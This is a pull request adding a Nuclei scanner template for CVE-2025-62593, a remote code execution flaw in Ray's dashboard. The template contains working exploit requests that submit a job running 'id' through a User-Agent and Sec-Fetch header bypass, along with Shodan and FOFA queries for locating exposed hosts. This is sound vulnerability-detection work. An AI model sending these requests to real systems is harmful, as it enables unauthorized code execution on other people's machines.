### PR TITLE
[CVE-2025-62593] Ray - Remote Code Execution

### DIFF
--- a/http/cves/2025/CVE-2025-62593.yaml
+++ b/http/cves/2025/CVE-2025-62593.yaml
@@ -1,0 +1,81 @@
+id: CVE-2025-62593
+
+info:
+  name: Ray - Remote Code Execution
+  author: kiyx
+  severity: critical
+  description: |
+    Ray versions prior to 2.52.0 rely on a weak heuristic to block browser-originated requests:
+    job submission is denied only when the User-Agent header starts with "Mozilla". Browsers like
+    Firefox and Safari allow overriding the User-Agent header in fetch requests, and the
+    Sec-Fetch-* headers sent by the browser were not checked, so a malicious page combined with a
+    DNS rebinding attack could reach the local Ray dashboard, submit a job and execute arbitrary
+    code on the host. This template emulates the browser request (custom User-Agent and a
+    Sec-Fetch header) and confirms code execution by reading the job output; patched versions
+    reject the request because of the Sec-Fetch header checks introduced in 2.52.0.
+  impact: |
+    An unauthenticated attacker can execute arbitrary code on any host exposing the Ray dashboard
+    (default port 8265), or on developer machines when the victim visits a malicious page while
+    running Ray locally.
+  remediation: |
+    Update Ray to version 2.52.0 or later and enable token authentication. Do not expose the Ray
+    dashboard to untrusted networks and restrict access to port 8265.
+  reference:
+    - https://github.com/ray-project/ray/security/advisories/GHSA-q279-jhrf-cc6v
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-62593
+    - https://github.com/ray-project/ray/commit/70e7c72780bdec075dba6cad1afe0832772bfe09
+    - https://github.com/Boreas37/CVE-2025-62593-PoC
+    - https://github.com/nccgroup/singularity/pull/68
+    - https://docs.ray.io/en/latest/ray-security/token-auth.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2025-62593
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: ray_project
+    product: ray
+    shodan-query:
+      - http.favicon.hash:463802404
+      - http.html:"ray dashboard"
+    fofa-query:
+      - icon_hash=463802404
+      - body="ray dashboard"
+  tags: cve,cve2025,rce,ray,kev,vkev,vuln
+
+variables:
+  submission: "nuclei-{{rand_base(8)}}"
+
+http:
+  - raw:
+      - |
+        POST /api/jobs/ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: nuclei
+        Sec-Fetch-Site: cross-site
+        Content-Type: application/json
+
+        {"entrypoint":"id","submission_id":"{{submission}}"}
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: nuclei
+
+        {{wait_for(5)}}
+
+      - |
+        GET /api/jobs/{{submission}}/logs HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: nuclei
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'logs')"
+          - "contains(content_type, 'application/json')"
+          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
+        condition: and

--- a/http/cves/2025/CVE-2025-62593.yaml
+++ b/http/cves/2025/CVE-2025-62593.yaml
@@ -2,7 +2,7 @@ id: CVE-2025-62593
 
 info:
   name: Ray - Remote Code Execution
-  author: kiyx
+  author: kiyx,avilum,JLLeitschuh
   severity: critical
   description: |
     Ray versions prior to 2.52.0 rely on a weak heuristic to block browser-originated requests:
@@ -43,7 +43,7 @@ info:
     fofa-query:
       - icon_hash=463802404
       - body="ray dashboard"
-  tags: cve,cve2025,rce,ray,kev,vkev,vuln
+  tags: cve,cve2025,rce,ray,intrusive,kev,vkev,vuln
 
 variables:
   submission: "nuclei-{{rand_base(8)}}"
@@ -64,7 +64,7 @@ http:
         Host: {{Hostname}}
         User-Agent: nuclei
 
-        {{wait_for(5)}}
+        {{wait_for(8)}}
 
       - |
         GET /api/jobs/{{submission}}/logs HTTP/1.1
@@ -77,5 +77,6 @@ http:
           - "status_code == 200"
           - "contains(body, 'logs')"
           - "contains(content_type, 'application/json')"
-          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
+          - "regex('uid=[0-9]+', body)"
+          - "regex('gid=[0-9]+', body)"
         condition: and


### PR DESCRIPTION
## CVE-2025-62593 - Ray Unauthenticated RCE (browser fetch bypass)

Adds a template for **CVE-2025-62593** (CISA KEV), the unauthenticated RCE in the Ray dashboard job API reachable through browser DNS rebinding.

### Why a new template

- The existing `CVE-2023-48022` template does not confirm execution on Ray versions that include the User-Agent based browser guard: the job POST is answered with `405 Method Not Allowed for browser traffic`, so no job is created and the logs request cannot match.
- It does not emulate the Firefox/Safari `fetch` bypass (User-Agent override) nor verify the `Sec-Fetch-*` mitigation introduced in the fix.
- No existing template references CVE-2025-62593 (requested in #16961).

### How it works

The template reproduces the request performed by the browser after DNS rebinding: custom `User-Agent` plus a `Sec-Fetch-Site` header, then reads the job logs and matches the `uid=... gid=...` output of the injected `id` command. The `Sec-Fetch-Site` header is what makes the check version-specific: patched versions reject the request, vulnerable versions accept it.

### Verification

Tested locally with Docker (no real-world targets):

| Image | Result |
| --- | --- |
| `rayproject/ray:2.51.0` (vulnerable) | 1 match - `[CVE-2025-62593] [http] [critical]`, job output `uid=1000(ray) gid=100(users)` |
| `rayproject/ray:2.52.0` (patched) | no match - POST rejected with `405` due to `Sec-Fetch-*` checks |

```bash
docker run -d -p 8265:8265 rayproject/ray:2.51.0 \
  bash -c "ray start --head --port=6379 --dashboard-host=0.0.0.0 --disable-usage-stats; sleep infinity"

nuclei -u http://127.0.0.1:8265 -t http/cves/2025/CVE-2025-62593.yaml
```

Fixes #16961
